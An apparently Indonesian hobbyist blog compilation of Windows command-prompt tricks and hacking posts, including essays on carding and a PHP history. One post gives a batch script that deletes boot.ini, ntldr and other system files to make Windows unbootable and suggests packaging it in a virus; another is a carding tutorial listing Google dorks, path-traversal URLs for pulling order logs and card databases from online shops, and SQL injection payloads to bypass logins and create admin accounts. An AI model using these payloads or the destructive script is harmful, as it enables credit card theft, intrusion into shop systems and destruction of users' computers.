Bagaimana cara anda menyimpan file/folder? Kebanyakan orang pasti melakukannya dengan cara klik kanan pada file/folder tersebut, kemudian mengganti attributnya dengan Hidden....Ya kan? Itu sih sudah biasa, lagipula cara menampilkannya sangat gampang juga. Betul gak???? Oke kalau begitu pada artikel saya kali ini, saya akan menjelaskan bagaimana cara meng-hidden file/folder dengan cara yang agak ribet dikit, tapi dijamin kalo cuma dilihat pake folder option biasa gak bakalan keliatan....Keren kan??? hiks..hiks..hiks...

Oke, tanpa basa-basi lagi, saya akan menjelaskan trik-triknya.

1. Buka command prompt (kalo gak tau, tekan win key + R. Setelah tu ketikkan cmd)
2. Arahkan ke directory tempat file/folder bersemayam
3. Setelah itu, ketikkan seperti ini.
attrib nama_file/folder +S +H, contoh : attrib FOLDERKU +S +H
(Catatan : Khusus untuk nama file harus disertakan juga file ekstensinya, misal .jpg, .doc, .mp3, dll)
4. Untuk menampilkannya kembali lakukan petunjuk berikut ini :
- Jangan lupa buka command prompt dulu
- Arahkan ke directory di mana file/folder tersebut berada
- Lalu ketikkan,
attrib nama_file/folder -S -H, contoh : attrib FOLDERKU -S -H
(Tinggal mengetikkan kebalikannya, jika ingin memasang hidden ketikkan +, sedangkan jika ingin melepas hidden ketikkan tanda -
5. Selamat mencoba, semoga berhasil.


Created by d'za
Read More...

Pada artikel saya yang sebelumnya, saya telah menjelaskan sedikit tentang berbagai perintah-perintah yang bisa anda gunakan pada Comment Prompt di Windows OS, Untuk itu pada artikel saya kali ini, saya akan menjelaskan tentang bagaimana cara mengganti password Account pada Windows lewat CMD. Anda pasti sudah penasaran bukan? Ikuti trik-triknya di bawah ini.

1. Yang pertama yang harus kita lakukan adalah membuka cmd melalui Start >> Run lalu ketikkan cmd dan tekan enter.
2. Lalu apa perintah yang bisa digunakan untuk mengganti password tersebut ? Perintah yang akan kita gunakan adalah perintah net. Untuk melihat apa saja kegunaan dari perintah net ini, ketikkan net /? lalu tekan enter. Untuk lebih spesifiknya, kita akan menggunakan perintah net user. Ketikkan perintah ini sehingga akan menampilkan daftar user yang ada pada Windows tersebut. Pada contoh di bawah terdapat user administrator, duken dan guest.
3. Lalu, bagaimana kita bisa mengganti password dari user-user tersebut? Ketikkan baris perintah net user /? untuk mengetahui fungsi-fungsi dari perintah ini. Kita akan melihat suatu fungsi untuk mengganti password yaitu :
net user username password|*
- perintah net user adalah perintah dasar yang wajib kita sertakan pada awal perintah tersebut
- username adalah nama user yang ingin kita ganti passwordnya. Pada contoh di sini misalnya username duken atau adminisrator
- password adalah password baru yang kita inginkan berlaku pada user tersebut.
- * (tanda bintang dapat digunakan untuk meniadakan/menghapus password atau jika kita ingin memastikan password tersebut sudah benar atau tidak dengan meminta konfirmasi password sekali lagi.
4. Pada contoh kali ini kita akan mengganti password dengan username duken. Untuk itu ketikkan baris kira-kira seperti di bawah ini. Anda dapat menyesuaikan username dengan username yang ada pada Windows Anda. net user duken 123456
5. Selesai!!! Coba anda logoff, dan masuk dengan user yang telah diganti passwordnya tadi. Password akan berubah menjadi 123456 sesuai dengan permintaan kita.
6. Bagaimana jika ingin mengosongkan/menghapus password tersebut? Ketikan : net user duken *
7. lalu jika ada tampilan untuk meminta password yang baru, kosongkan lalu tekan enter hingga pesan mengganti password telah berhasil dilakukan. Bagaimana jika kita membutuhkan akses cepat dalam mengganti password banyak komputer? Terus, bagaimana mengantisipasi orang-orang yang belum terbiasa dengan layar hitam tersebut ? Baiklah kita akan mengakses kode tersebut melaui file bat yang dapat dibuat
melalui sebuah notepad.
1. Buka notepad melalui Start > All Program > Accessories > Notepad
2. Ketikkan kode-kode seperti di atas, tidak ada beda. net user duken 123456. Jangan lupa untuk mengganti usernya sesuai dengan user yang ada pada Windows Anda.
3. Setelah itu simpan dengan nama ganti-password.bat atau apalah namanya yang penting dengan ekstensi *.bat. Jangan lupa untuk mengubah Save As Type menjadi All Files.
4. Setelah itu klik 2 kali file ganti_password.bat tadi untuk menjalankannya.
5. Selesai!!! Password baru telah telah dibuat untuk user duken tadi.

Sebenarnya cara dengan menggunakan notepad tadi sama saja dengan menggunakan cmd. Hanya saja cara dengan notepad bisa sedikit lebih cepat. Jadi sebenarnya, banyak cara yang bisa kita gunakan dengan tool-tool bawaan Windows untuk mengganti password sebuah akun tanpa susah payah.

Created by d'za
Read More...

Waduw, dilihat dari judulnya saja sudah sangat menyeramkan, tapi anda jangan berpikir tentang hal-hal yang negatif terlebih dahulu, soalnya sebenarnya artikel saya kali ini cuma membahas tentang bagaimana cara cepat untuk merusak windows saja, jadi jangan khawatir, komputer anda tidak akan rusak kok, cuman anda hanya butuh melakukan installasi windows lagi saja. hiks hiks hiks.....
Untuk itu, saya akan memberi tahu anda bagaimana langkah-langkahnya. Yang pertama anda lakukan adalah membuka aplikasi note pad anda, lalu copy paste skript di bawah ini.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
simpan penggalan script diatas notepad, dan simpan dgn file apa aja, yang penting berformat *.bat

yupz... saya jelasin satu2 yach scriptnya.
del c:\autoexec.bat <-- buat hapus autoexe.bat di direktori C del c:\boot.ini <---- buat hapus Boot.ini di direktori C del c:\ntldr <--- buat hapus ntldr del c:\windows\win.ini <----- untuk hapus file win.ini yang berlokasi di C:/windows attrib -r -s -h <--- untuk menampilkan file ke 4 windows tadi yang di supper hidden tanpa file autoexec.bat, boot.ini, ntldr, dan win.ini komputer yang bersistem operasikan windows tdk akan mau hidup... hahahahahaha ehm... skrg gmn kl code tadi di masukan dalam virus buatan kita... wew... yakin deh ga ada antivirus buat penawarnya kl sudah terinfeksi.. hahaahhaha...

Created by d'za
Read More...

Dari judulnya saja pasti sudah membuat anda heran dan penasaran, tapi jangan khawatir, biyar tidak penasaran lagi saya akan menjelaskan apa yang saya maksud dan bagaimana cara untuk melakukanya. Maksudnya adalah membuat lampu ketboard pada komputer anda kelap-kelip sendiri tanpa ada yang memencet tombol, seperti sulap bukan? Pasti anda heran bagaimana caranya? Oke, tanpa basa-basi lagi, saya akan menjelaskan tehniknya. 
langkah pertama anda harus buka note pad terlebih dahulu. Lalu copy paste skript di bawah ini :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

Simpan dengan nama "format.vbs". Langkah selanjutnya anda cukup double klick dech, maka lampu indikator pada keyboard anda akan berkedip-kedip. keren bukan. hehehehehe......

Untuk matiin skript ini anda tinggal buka taks manager, masuk tab process, lalu cari "wscript.exe", kemudian langkah terakhir anda tinggal pilih eng process. gampang bukan???

Created by d'za
Read More...

Hacker Vs Craker Vs Carder dan Hacking Vs Carding saya harap menjawab beberapa pertanyaan dan kegundahan para visitor Blog ini yang masuk melalui keywords tersebut. Hampir 80% visitor yang masuk ke Blog ini yang melalui search engine menggunakan keyword seperti credit card generator, trik terbaru carding, valid cvv, free credit card generator online, cridet card generator with cvv2 id, cc cvv, cvv generator free download, nomor credit card, free cc valid with cvv2, cara mendapatkan no cc, cvv2 cc, free credit card valid, free credit card dan cvv2, dan semuanya akan menuju posting saya tentang Free valid credit card and cvv2 . Sebelum kita bahas tentang tentang Hacker, Craker, Carder , hacking dan carding mungkin kita harus menyamakan persepsi dulu tentang pengertian istilah tersebut. Anda bisa menuju postingan dari Bpk. Romi Satria Wahono sang pendiri IlmuKomputer.org tentang meluruskan salah kaprah tentang hacker . Saya sealiran dengan Bpk. Romi tentang definisi tersebut.

Pelaku carding (penyalahgunaan kartu kredit), phreaking, dan defacing bukanlah hacker tapi mereka adalah cracker. Ungkapan legendaris dari Eric S Raymond dalam tulisan berjudul how to become a hacker, “hacker membangun banyak hal dan cracker merusaknya“. Hacker sejati adalah seorang programmer yang baik. Sesuatu yang sangat bodoh apabila ada orang atau kelompok yang mengklaim dirinya hacker tapi sama sekali tidak mengerti bagaimana membuat program. Sifat penting seorang hacker adalah senang berbagi, bukan berbagi tool exploit, tapi berbagi ilmu pengetahuan. Hacker sejati adalah seorang penulis yang mampu memahami dan menulis artikel dalam bahasa Ibu dan bahasa Inggris dengan baik. Hacker adalah seorang nerd yang memiliki sikap (attitude) dasar yang baik, yang mau menghormati orang lain, menghormati orang yang menolongnya, dan menghormati orang yang telah memberinya ilmu, sarana atau peluang.

Dari beberapa forum yang saya ikuti banyak pertanyaan seperti "Bagaimana cara cepat belajar ....?", Untuk menjadi seorang hacker butuh tidak ada istilah instan. Saya tidak lah pantas menyebut diri sendiri sebagai hacker karena saya baru belajar tentang pemrograman 2 tahun lalu. Seperti yang dikatakan Eric S Raymond, "Untuk menjadi seorang hacker membutuhkan pengetahuan, latihan, dedikasi, dan kerja keras. Jadi tidak ada cara instan untuk menjadi hacker. Jadi buat siapapun yang ingin menjadi hacker secara instan lupakan saja cita-cita anda.

Jika kita sudah memahami siapa itu Hacker ,Craker, Carder . Yang paling tidak bisa di sandingkan adalah Carder. Untuk menjadi seorang Carder anda tidak butuh yang namanya pengetahuan. Yang dibutuhkan seorang Carder adalah kartu credit yang valid dengan cvv dan expired date. Dan untuk mendapatkannya juga mudah. Nanti akan saya bahas bagaimana seorang carder mendapatkan credit card. Yang menjadi persaingan adalah antara Hacker dan Cracker. Dua pribadi tersebut sama-sama memiliki skil programming yang bagus. Seorang Hacker membangun suatu sistem dengan proses maju kedepan, sedang seorang craker menggunakan cara terbalik (reverse enginering). Memang tidak ada suatu sistem yang tidak bisa di balik, kebanyakan semua sistem bisa direverse. Saat ini Hacker juga menguji sistem yang dimilikinya dengan methode reverse untuk mengetahui kelemahan sistemnya.

Hacking dan Carding merupakan dua hal yang berbeda, jadi jangan bangga jika anda bisa menggunakan credit card orang lain untuk berbelanja, karena itu tidaklah membutuhkan ketrampilan khusus. Carding merupakan aktivitas penggunaan katu credit orang lain untuk melakukan pembayaran baik online maupun offline. Sedangkan haking adalah suatu aktifitas belajar yang penuh antusias terhadap pekerjaan dan tidak pernah menyerah karena gagal, yang dalam hal ini mungkin dalam programming maupun yang lainnya.

Sekarang pertanyaannya adalah "Ingin menjadi Apa Aku ini ? seorang Hacker , Craker atau Carder ?"
Semuanya memiliki konsekuensi yang harus dipertanggung jawabkan.

Created by d'za
Read More...

Pada artikel saya yang sebelumnya, saya telah menjelaskan apa itu yang dimaksud dengan carding, untuk itu pada artikel saya sekarang, kali ini saya akan menjelaskan tentang sedikit cara-cara Carding Card. Sebelum itu terlebih dahulu saya akan memperingatkan anda bahwa sebenarnya carding itu tidak diperbolehkan, dan hukumnya itu haram, tapi mungkin kalau digunakan untuk mencoba-coba, mungkin tidak apa-apa, hiks hiks hiks...
Oke tanpa basa basi lagi, saya akan menjelaskan bagaimana trik-trik untuk melakukan carding, trik-trik itu adalah sebagai berikut :
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp



11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template=order.log

13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="


Created by d'za
Read More...

Bagi anda yang suka bermain-main di dunia bisni dan internet, anda pasti sudah tidak asing lagi dengan istilah carding card. Di Internet, istilah ini cukup banyak digunakan untuk suatu aktifitas yang berhubungan dengan kartu kredit. Misalnya transaksi e-commerce yang pembayarannya dilakukan dengan menggunakan kartu kredit, kejahatan penggunaan kartu kredit orang lain secara ilegal untuk suatu transaksi dan lain sebagainya. Orang yang menggunakan kartu kredit tersebut disebut dengan Carder.
Carding muncul ketika otang yang bukan pemilik kartu kredit menggunakan kartu credit tersebut sebagai perbuatan melawan hukum. Terdapat juga difinisi yang lain tentang cyber crime yang dirumuskan sebagai perbuatan melawan hukum yang dilakukan dengan memakai jaringan komputer sebagai sarana/alat atau computer sebagai objek, baik untuk memperoleh keuntungan ataupun tidak, dengan merugikan pihak lain. Terhadap difinisi tersebut dapat diartikan secara luas yaitu mencakup seluruh bentuk baru kejahatan yang ditujukan pada computer, jaringan computer dan penggunanya, serta bentuk-bentuk kejahatan tradisional yang sekarang dilakukan dengan menggunakan atau dengan bantuan peralatan computer. Cyber crime yang dapat merugikan perekonomian Negara yaitu dengan melalui kegiatan perbankan antara lain adalah : 1. Typo site : pelaku membuat nama situs palsu, persis seperti situs asli, 2. Keystroke longer,3. Sniffing, 4. Brute force attacking, 5. Web deface, 6. Email spamming.

Menurut perusahaan Security Clear Commerce di Texas USA, di Indonesia menduduki peringkat kedua setelah Ukrania dalam hal kejahatan Carding8 (kartu Kredit) dengan menggunakan teknologi informasi (Internet) yaitu menggunakan kartu kredit orang untuk melakukan pemasaran barang secara online. Dimana komunikasi awal dibangun melalui e-mail untuk menanyakan kondisi barang dan melakukan transaksi, setelah terjadi kesepakatan pelaku memberikan nomor kartu kreditnya dan penjual mengirimkan barang, cara ini relatif aman bagi pelaku, karena penjual biasanya mengirim barannya dalam tempo 3-5 hari untuk melakukan kliring atau pencairan dana, sehingga pada saat penjula mengetahui bahwa nomor kartu kredit tersebut bukan milik pelaku dan barang sudah terlanjur dikirim.

Macam dan bentuk lain adalah dimana seorang laki-laki asal bandung telah membuat situs asli akan tetapi palsu layanan internet banking BCA,Steven5 membeli domain mirip dengan www.klikbca.com (situs asli Internet banking BCA yaitu wwwklik-bca.com, klikbca.com, cklikbca.com, klickca.com dan klikbac.com). Jika nasabah salah mengetik, maka dana nasabah tersebut akan masuk perangkap situs Steven tersebut. Kegiatan-kegiatan tersebut dilakukan, apabila setiap pelaku membuat situs-situs samaran atau palsu yang dapat mengakibatkan menimbulkan kerugian bagi pihak perbankan maupun bagi yang memegang dana kartu kredit tersebut, dimana sistem jaringan perbankan akan terganggu yang disebakan oleh para pelaku kejahatan Cyber Crime di Indonesia yang terdiri dari berbagai bentuk kejahatan seperti : Typo Site, Keylogger/Keystroke Logger, Sniffing, Brute Force Attacking, Web Deface, Email Spamming, Denial of Service, Virus, Worm, Trojan dan kejahatan kartu kredit yang melalui jaringan internet dengan menggunakan situs-situs palsu yang lagi marak si era perekonomian global di Indonesia.

Jika masalah ini tidak ditanggulangi oleh Pemerintah Indonesia dengan secara seksama yaitu dengan memberlakukan kebijakan dasar mapun kebijakan pemberlakuan yang merupakan sebagai paying yang membatasi kejahan Cyber Crime tersebut dengan memberikan sanksi berupa kurungan badan yang seberat-beratnya dan denda berupa uang yang setinggi-tingginya. Perlu diketahui bahwa system jaringan perbankan akan terpengaruh dan secara tidak sadar akan menanggung kerugian dari pemegang kartu kredit atau kegiatan lain yang melalui perbankan, apabila pihak perbankan tidak mau menanggung segala resikonya dapat mengakibatkan ketidak percayaan para investor dalam negeri maupun investor asing/luar negeri untuk menanamkan modalnya di Indonesia, mengingat kepastian hukum yang merupakan sebagai kebijakan dasar maupun sebagai kebijakan pemberlakukan, tidak menjamin adanya kepastian hukum yang pasti.

Jika kegiatan perekonomian di Indonesia selalau diganggu, maka akan perpengaruh kepda kegiatan perbankan di Indonesia, sebagai diakibat kejahatan Cyber Crime pada jaringan system perbankan melalui system jaringan internet, baik kegiatan kejahatan secara internal (dalam negeri) maupun secara eksternal (Luar Negeri), dan untuk mengupayakan pencegahan terhadap Kejahatan Cyber Crime harus dilakukan suatu pembatan terhadap kegiatantersebut, baik dengan kebijakan dasar maupun kebijakan pemberlakukan yang berupakan sebagai payung hukum yaitu Undang- Undang Dasar 1945, Pasal 33 ayat (4), Undang-Undang No. 3 Tahun 2004, Pasal 7 ayat (2), Undang-Undang No. 17 Tahun 2003, UU No. 36 Tahun 1999 tentang Telekomunikasi dan Draft RUU Cyber Crime6 yang masih di bahas di Dewan Perwakilan Rakyat. Mari kita tengok sekilas isi dari UUD 1945 yaitu Pasal 33 ( yang harus dipertegang pengaturannya maupun sangsi hukumannya), yang mengakibatkan keinginan dari pasal-pasal tersebut tidak akan tercapai baik secara internal maupun secara eksternal, apabila kegiatan perekonomian khususnya dunia perbankan dan keuangan Negara diganggu kestabilannya didalam pengaturan keuangan negara.

Atas dasar tersebutlah, dimana kejahatan Cyber Crime tidak dapat dicegah karena kurangnya perangkat atau koridor hukum7 yang jelas pengaturannya, jika hal ini terus berlangsung maka akan berakibat menimbul kerugian yang sangat besar bagi Negara, yang khususnya pada pihak perbankan di Indonesia yang berhubunga dengan peredaran dan pengawasan terhadap keuangan perbankan di Indonesia. Pada kasus-kasus Cyber Crime diatas, sebaiknya RUU Cyber Crime tersebut harus melakukan sosialisasi secara internal maupun secara eksternal, apabila undang-undang tersebut telah diundangkan dan diberlakukan, agar tidak menimbulkan keragu-raguan yang mana merupakan sebagai kebijakan dasarnya dan yang mana merupakan sebagai kebijakan pemberlakuan dengan tujuan agar tidak terjadinya tumpang tindih kebijakan antara yang satu kebijakan yang satu dengan kebijakan yang lainnya.
Jika pemberlakukan Undang-Undang Cyber Crime yang nantinya akan disahkan, yang walaupun sampai pada saat ini masih berupa RUU Cyber Crime8, harus memperhatikan tata cara pencegahan, sangsi hukuman maupun denda untuk membuat jera dan memperhatikan perkembangan tekhnologi secara berkelanjutan, agar tidak ketinggalan oleh tekhnologi para pelaku Cyber Crime, yang setiap saat selalu melakukan eksperimen-eksperimen terhadap jaringan internet untuk mempermudah/menerobos jaringan system perbankan.

Walaupun upaya pencegahan dengan adanya Draft RUU Cyber Crime dan UU No. 36 Tahun 1999 tentang Petelekomikasian di Indonesia, segala kegiatan yang berkaitan dengan kegiatan perbankan, akan selalu diikuti oleh para pelaku Cyber Crime untuk berupaya melakukan tindakan kejahatan dengan tujuan mengambil uang atau dana orang lain dengan secara melawan hukum/illegal. Dimana baik secara langsung maupun tidak langsung, kerugian yang diderita pihak perbankan sangat besar, mengingat kejahatan Cyber Crime terdiri dari berbagai macam dan bentuknya seperti : Typo Site , Keylogger/Keystroke Logger, Sniffing, Brute Force Attacking, Web Deface, Email Spamming, Denial of Service, Virus, Worm, Trojan dan kejahatan kartu kredit.

Perlu diketahui dimana kerugian pihak perbankan tidak secara langsung, karena dana atau uang yang diambil oleh pelaku Cyber Crime adalah dana nasabah, akan tetapi karena nasabah merasa tidak melakukan transaksi9 dengan pihak lain, dan secara pandangan menurut hukum transaksi yang telah dilakukan oleh pelaku Cyber Crime tersebut adalah merupakan sebagai tanggung jawab pihak perbankan. Masalah inilah yang dianggap penulis sebagai kerugian pihak perbankan yang secara otomatis dapat mengganggu perekonomian pembangunan Indonesia, karena akibat dari adanya kejahatan Cyber Crime, para investor10 takut melakukan transaksi dengan perbankan di Indonesia, yang paling utama melakukan transaksi melalui jaringan internet dan juga karena ketidak pastian hukum Cyber Crime di Indonesia.
Dengan demikian dimana kejahatan Cyber Crime adalah suatu kejahatan dunia alam maya yang tidak dapat dideteksi setiap saat, mengingat kejahatan Cyber Crime adalah suatu kejahatan yang dilakukan oleh pelaku dengan identitas yang tidak jelas atau akuran (memakai samaran identitas nasabah lain). Dan untuk lebih jelasnya adalah perlunya pembatasan nama situs seseorang/badan hukum11 yang tidak dapat digunakan oleh orang lain, dengan cara mendata nama-nama situs serta meregister untuk mendapatkan keakuratan data-data situs yang identitasnya sudah pasti benar-benar asli (bukan samaran).

Melihat dari perumusan masalah tersebut diatas, penulis berusaha menganalisa permasalahan baik secara faktor internal maupun secara faktor eksternal dengan melihat kepada kebijakan dasar maupun kebijakan pemberlakukan yang merupakan landasan dan payung hukum didalam melakukan kegiatan perekonomian dalam pembangunan Indonesia. Dengan melihat permasalahan seperti Pengertian Cyber Crime yang berada pada jaringan internet atau situs, bentuk Cyber Crime pada sektor perbankan dan upaya-upaya untuk mengantisipasi Cyber Crime di sektor Perbankan untuk mendukung Pembangunan ekonomi di Indonesia adalah masalah-masalah yang sangat penting untuk dianalisa.
Cuman ini yang saya tahu tentang istilah dari carding, kalau anda masih bingung silahkan anda browsing lewat om google saja yach...baru nanti kalau ada perkembangan tentang carding saya akan menulis di artikel saya yang lain. hiks hiks hiks...

Creataed by d'za
Read More...

Setelah pada artikel saya yang sebelumnya saya menjelaskan tentang Apache dan MySQL yang merupakan aplikasi yang digunakan untuk melakukan installasi atau membuat web server, maka kali ini saya juga akan membahas tentang salah satu yang digunakan untuk membuat web server, aplikasi itu adalah PHP. Sebelum melangkah lebih lanjut, terlebih dahulu saya akan menjelaskan tentang apa itu PHP. PHP adalah bahasa pemrograman web atau scripting language yang didesain untuk web. PHP dibuat pertama kali oleh satu orang yaitu Rasmus Lerdorf, yang pada awalnya dibuat untuk menghitung jumlah pengunjung pada homepagenya. Diawal Januari 2001, PHP telah dipakai lebih dari 5 juta domain diseluruh dunia, dan akan terus bertambah karena kemudahan aplikasi PHP ini dibandingkan dengan bahasa Server side yang lain. Anda dapat melihat angka sesungguhnya di http://www.php.net/usage.php.
Saat ini PHP amat populer dan menggantikan Perl yang sebelumnya juga populer sebagai bahasa scripting web. PHP telah menjadi modul Apache terpopuler (menurut www.securityspace.com), melebihi FrontPage dan mod_perl. Dan menurut hasil survei www.netcraft.co.uk, PHP terus meningkat penggunaannya dan telah digunakan pada jutaan domain dan jutaan alamat IP.
PHP telah digunakan oleh berbagai situs populer baik luar negeri maupun situs dalam negeri. Termasuk situs benpinter.net sendiri juga dibuat dengan PHP.

Seputar sejarah tentang PHP:

- Akhir 1994: Rasmus Lerdorf, programmer Unix dan Perl membuat skrip Makro Perl CGI yang dapat mengetahui siapa saja yang mengakses resumenya yang ditaruh di web.
- Awal 1995: PHP 1 (Personal Home Page Tools), Rasmus menulis ulang PHP dalam C dan mengajarkan belasan programmer untuk menggunakannya. Ia juga melengkapinya dengan Form Interpreter(FI) untuk memproses SQL dan data Form.
- Sept-Okt 1995: PHP 2. Kode PHP dan FI ditulis ulang dan digabungkan menjadi PHP/FI, akhir 1995 dibagikan gratis bagi publik pertama kalinya
- Apr 1996: Rasmus menulis mod_php, modul PHP untuk Apache
- Des 1996: PHP/FI pertama kali mendukung MySQL dan telah dipakai di 15 ribu situs di dunia
- Pertengahan 1997: Pemakai PHP/FI mencapai 50 ribu situs
- Okt 1997: PHP3 dimulai dengan sumbangan parser dari Zeev dan Andi
- Jan 1998: Dukungan MySQL untuk Windows dan PHP mendukung lebih dari 7 database, mSQL, MySQL, Sybase, PostgreSQL, SQL Server, Adabas dan Oracle.
- 6 Juni 1998: PHP 3 (Professional Home Page) dirilis
- Des 1998: PHP disertakan di RedHat Linux (PHP 3 sejak RedHat 6.2 dan PHP 4 sejak 7)
- Mei 1999: PHP 4 beta
